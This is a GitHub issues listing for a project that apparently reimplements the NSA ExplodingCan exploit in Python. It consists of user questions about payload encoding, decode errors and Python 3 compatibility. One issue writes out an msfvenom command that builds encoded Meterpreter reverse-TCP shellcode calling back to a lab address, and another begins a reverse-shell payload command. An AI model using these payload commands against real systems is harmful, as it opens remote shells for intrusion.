explodingcan icon indicating copy to clipboard operation
explodingcan copied to clipboard

An implementation of NSA's ExplodingCan exploit in Python

Results 7 explodingcan issues
Sort by recently updated
recently updated
newest added

```bash sudo msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.14.5 LPORT=443 | tee shellcode ```

Sorry if this is a newb question :D I am a sec student I am unable to get this to work with a non-staged payload, eg) `msfvenom -p windows/shell_reverse_tcp -f...

Hi First I would to appreciate you for this great work . I need to know what the encoded of payload should I put in ? And How I can...

Hi, Each time I try to use your script on a known vulnerable machine, I have this error : > [-] 'utf16' codec can't decode byte 0x41 in position 742:...

The latest version of Python 3 had some package renamings making it not possible to run directly on py3

Hi. plz Update code and add Auto generate shell code. thanks a lot.

Hi. Plz update or help fixed Error ![image](https://github.com/user-attachments/assets/d1d4ab3c-84cf-44a4-b57c-d9a7da07cfe6)